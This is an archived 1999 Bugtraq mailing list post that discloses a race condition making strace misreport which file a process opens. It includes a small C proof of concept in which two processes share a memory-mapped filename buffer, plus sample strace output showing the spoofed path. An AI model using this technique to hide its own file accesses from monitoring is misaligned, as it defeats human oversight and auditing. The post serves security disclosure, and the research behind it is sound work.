Home page logo
/

bugtraq logo Bugtraq mailing list archives

strace can lie
From: pavel () SUSE CZ (Pavel Machek)
Date: Sat, 25 Dec 1999 23:04:52 +0100


Hi!

When you see snippet from strace, that says:

open("/etc/passwd", O_RDONLY)           = 3

Do you trust it? You should not.

Malicious program could open _any_ file on filesystem with this
syscall. Here is example of such malicious program:

void
main(void)
{
  char *c = 0x94000000;
  open( "/tmp/delme", O_RDWR );
  mmap( c, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, 3, 0);
  *c = 0;
  if (fork()) {
    while(1) {
      strcpy( c, "/public" );
      strcpy( c, "/secret" );
    }
  } else
    while (1)
      open( c, 0 );
}

Depending on races, /public or /secret is printed with strace. This
can be reproduced even on UP and easiest way to do so is to make
/public file readable, and then look if you get

[pid   224] open("/public", O_RDONLY)  = 718
[pid   224] open("/secret", O_RDONLY)  = 719
[pid   224] open("/public", O_RDONLY)  = 720

snippet like this. It is impossible for kernel to open non-existent
file; that means that strace printed something that did not actually
happen.

Any ideas how to get rid of this problem? It is nasty. It is very
nasty and makes strace unusable for anything security-sensitive.
                                                                Pavel
PS: You don't need two processes sharing memory. Memory-mapped file
will do the job. This was just illustration.

--
I'm pavel () ucw cz  "In my country we have almost anarchy and I don't care."
Panos Katsaloulis describing me w.r.t. patents me at discuss () linmodems org



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault